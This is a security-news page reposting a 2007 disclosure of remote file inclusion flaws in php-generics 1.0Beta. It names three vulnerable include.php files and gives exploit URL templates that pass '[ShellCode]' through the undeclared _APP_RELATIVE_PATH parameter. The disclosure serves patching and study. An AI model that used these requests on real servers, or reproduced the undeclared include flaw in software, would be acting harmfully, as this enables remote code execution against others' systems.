Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  PunBB <= 1.2.14 Multiple Vulnerabilities (Advisory)

  phpGalleryScript 1.0 (init.gallery.
php include_class) RFI Vulnerability

  RFI Weatimages Hack

  Crea-Book <= 1.0 Admin Access Bypass / DB Disclosure / Code Execution

From:bd0rk_(at)_hackermail.com <bd0rk_(at)_hackermail.com>
Date:11 апреля 2007 г.
Subject:php-generics 1.0 Remote File Inclusion Vulnerabilities

                 --------------------------------------------------------
                
                                          
                  php-generics 1.0 Remote File Inclusion Vulnerabilities
                
                 --------------------------------------------------------


Software: php-generics 1.0Beta

Vendor: http://ie.archive.ubuntu.com/sourceforge/p/ph/php-generics/php-generics-1.0.0-bet
a.zip

       http://sourceforge.net/projects/php-generics/

Bugfounder: bd0rk

Vulnerable files: include.php, /dbcommon/include.php, /exception/include.php

[+]Exploit 1: http://[target]/[directory]/include.php?_APP_RELATIVE_PATH=[ShellCode]

[+]Exploit 2: http://[target]/[directory]/dbcommon/include.php?_APP_RELATIVE_PATH=[ShellCode]

[+]Exploit 3: http://[target]/[directory]/exception/include.
php?_APP_RELATIVE_PATH=[ShellCode]

Problem: $_APP_RELATIVE_PATH is not declared before include_once and no configfile is aviable

Greetings: str0ke, TheJT, HaSSPappeL ;-)

Website1: www.soh-crew.it.tt

Website2: www.hackschool.dl.am

#The 18 years old, german Hacker bd0rk

# milw0rm.com [2007-04-05]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород